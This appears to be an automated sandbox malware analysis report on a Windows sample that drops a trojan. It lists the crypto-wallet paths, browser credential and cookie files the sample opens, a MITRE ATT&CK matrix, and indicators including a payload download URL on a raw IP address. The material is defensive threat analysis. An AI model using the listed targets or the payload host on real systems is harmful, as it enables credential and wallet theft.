                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyNameJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBFDC18 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_00000218BFBFDC18
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD0110 GetUserNameW,8_2_00000218BFBD0110
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD1660 GetTimeZoneInformation,GlobalMemoryStatusEx,wcsftime,GetModuleFileNameA,8_2_00000218BFBD1660
                Source: C:\Users\user\Desktop\9RM52QaURq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: 3UuxTH6FMX.exe PID: 3760, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.3UuxTH6FMX.exe.218bfb50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.3UuxTH6FMX.exe.218bfb50000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3UuxTH6FMX.exe PID: 3760, type: MEMORYSTR
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets`
                Source: 3UuxTH6FMX.exe, 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletletses
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoremlser
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletletses
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\wallets
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoremlser
                Source: 3UuxTH6FMX.exe, 00000008.00000003.2121125510.00000218BE24A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets"
                Source: powershell.exe, 00000005.00000002.1981163512.0000000006154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCKJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: Process Memory Space: 3UuxTH6FMX.exe PID: 3760, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: 3UuxTH6FMX.exe PID: 3760, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.3UuxTH6FMX.exe.218bfb50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.3UuxTH6FMX.exe.218bfb50000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3UuxTH6FMX.exe PID: 3760, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                12
                System Time Discovery
                Remote Services1
                Archive Collected Data
                12
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                PowerShell
                Logon Script (Windows)1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                Security Account Manager4
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                Process Injection
                1
                Timestomp
                NTDS25
                System Information Discovery
                Distributed Component Object Model1
                Email Collection
                2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets131
                Security Software Discovery
                SSHKeylogging13
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                9RM52QaURq.exe18%ReversingLabsWin32.Adware.RedCap
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exe29%ReversingLabsWin64.Trojan.Cerbu
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://150.241.95.163/brozer.exeP0%Avira URL Cloudsafe
                http://150.241.95.1630%Avira URL Cloudsafe
                http://150.241.95.163/brozer.exe0%Avira URL Cloudsafe
                http://150.241.95.163/brozer.exeIError0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ipify.org
                172.67.74.152
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://150.241.95.163/brozer.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtab3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://150.241.95.163/brozer.exeP9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
